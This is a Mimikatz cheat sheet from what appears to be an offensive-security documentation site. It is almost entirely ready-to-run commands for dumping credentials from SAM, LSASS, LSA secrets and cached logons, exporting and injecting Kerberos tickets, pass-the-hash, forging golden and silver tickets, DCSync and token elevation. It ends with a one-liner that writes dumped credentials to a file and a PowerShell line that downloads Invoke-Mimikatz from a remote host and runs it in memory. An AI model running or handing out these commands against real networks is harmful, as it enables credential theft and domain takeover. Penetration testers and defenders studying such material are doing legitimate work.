> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Mimikatz

> Mimikatz cheat sheet: credential dumping, pass-the-hash, pass-the-ticket, golden/silver tickets, and token manipulation.

## Download

### GitHub (Official)

```bash theme={"dark"}
# Latest release
https://github.com/gentilkiwi/mimikatz/releases
```

### Kali Linux (Pre-installed)

```bash theme={"dark"}
# Binaries location
ls /usr/share/windows-resources/mimikatz/

# Win32
/usr/share/windows-resources/mimikatz/Win32/mimikatz.exe

# x64
/usr/share/windows-resources/mimikatz/x64/mimikatz.exe
```

### PowerShell Version (Invoke-Mimikatz)

```bash theme={"dark"}
# Empire's version (most maintained)
https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1
```

***

## Check Target Architecture

Pick correct binary (Win32 or x64) based on target OS.

```cmd theme={"dark"}
wmic os get osarchitecture
```

```powershell theme={"dark"}
[Environment]::Is64BitOperatingSystem
```

```cmd theme={"dark"}
echo %PROCESSOR_ARCHITECTURE%
```

| Output                      | Binary               |
| --------------------------- | -------------------- |
| `64-bit` / `AMD64` / `True` | `x64/mimikatz.exe`   |
| `32-bit` / `x86` / `False`  | `Win32/mimikatz.exe` |

<Warning>
  Using wrong architecture = crash or silent failure. Always check before running.
</Warning>

***

## Setup

```cmd theme={"dark"}
mimikatz.exe
privilege::debug
```

Expected output: `Privilege '20' OK` — means SeDebugPrivilege enabled.

***

## Credential Dumping

### Dump SAM (Local Accounts)

```
lsadump::sam
```

### Dump LSASS (Logged-on Users)

```
sekurlsa::logonpasswords
```

### Dump Cached Domain Credentials

```
lsadump::cache
```

### Dump LSA Secrets

```
lsadump::secrets
```

### Export Kerberos Tickets

```
sekurlsa::tickets /export
```

***

## Pass-the-Hash (PtH)

```
sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<hash>
```

Opens new cmd.exe as target user. Combine with `psexec` or `wmiexec` for remote access.

***

## Pass-the-Ticket (PtT)

### Inject existing ticket

```
kerberos::ptt <ticket.kirbi>
```

### Verify

```cmd theme={"dark"}
klist
```

***

## Golden Ticket

Requires `krbtgt` NTLM hash + domain SID.

```
kerberos::golden /user:Administrator /domain:target.local /sid:<domain-SID> /krbtgt:<ntlm-hash> /ptt
```

### Get Domain SID

```cmd theme={"dark"}
whoami /user
```

Or via PowerView:

```powershell theme={"dark"}
Get-DomainSID
```

***

## Silver Ticket

Forges TGS for specific service. Requires service account NTLM hash.

```
kerberos::golden /user:Administrator /domain:target.local /sid:<domain-SID> /target:<server> /service:<service> /rc4:<ntlm-hash> /ptt
```

Common services: `cifs`, `http`, `mssql`, `ldap`, `host`.

***

## DCSync

Simulates domain controller replication to pull hashes remotely.

```
lsadump::dcsync /domain:target.local /user:Administrator
```

All users:

```
lsadump::dcsync /domain:target.local /all /csv
```

***

## Token Manipulation

```
token::elevate
token::elevate /domainadmin
```

***

## Dump Wi-Fi Passwords

There is no `misc::wifi`; Wi-Fi decryption lives in the `dpapi` module.

```
dpapi::wifi /in:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{GUID}\{PROFILE}.xml" /unprotect
```

***

## One-Liners

### Dump creds and exit

```cmd theme={"dark"}
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt
```

### PowerShell in-memory

```powershell theme={"dark"}
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
```
